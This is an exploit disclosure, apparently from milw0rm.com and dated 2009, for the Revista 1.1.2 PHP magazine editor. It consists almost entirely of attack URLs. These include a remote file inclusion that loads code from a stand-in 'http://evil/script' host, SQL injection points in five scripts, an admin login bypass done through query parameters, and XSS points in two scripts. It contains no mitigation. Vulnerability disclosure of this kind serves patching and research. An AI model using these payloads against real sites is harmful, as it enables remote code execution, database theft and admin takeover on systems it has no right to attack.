59 lines
No EOL
1.4 KiB
Text
59 lines
No EOL
1.4 KiB
Text
Discovered by Sirdarckcat from elhacker.net
|
|
|
|
------------------------------------------------------------------------
|
|
------------
|
|
|
|
Revista 1.1.2
|
|
|
|
http://php-revista.sourceforge.org
|
|
|
|
------------------------------------------------------------------------
|
|
------------
|
|
|
|
Revista is a simple spanish PHP magazine editor.
|
|
|
|
It was done by php.org.mx
|
|
|
|
It suffers of multiple vulnerabilities.
|
|
|
|
------------------------------------------------------------------------
|
|
------------
|
|
|
|
Remote File Inclusion
|
|
|
|
http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script
|
|
|
|
------------------------------------------------------------------------
|
|
------------
|
|
|
|
SQLi
|
|
|
|
http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]
|
|
|
|
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]
|
|
|
|
http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]
|
|
|
|
http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]
|
|
|
|
http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]
|
|
|
|
------------------------------------------------------------------------
|
|
------------
|
|
|
|
Credentials Bypass
|
|
|
|
http://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1
|
|
|
|
------------------------------------------------------------------------
|
|
------------
|
|
|
|
XSS
|
|
|
|
http://revista/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>
|
|
|
|
http://revista/estilo/[ANY STYLE]/lista.php?email=<XSS>
|
|
|
|
------------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2009-04-14] |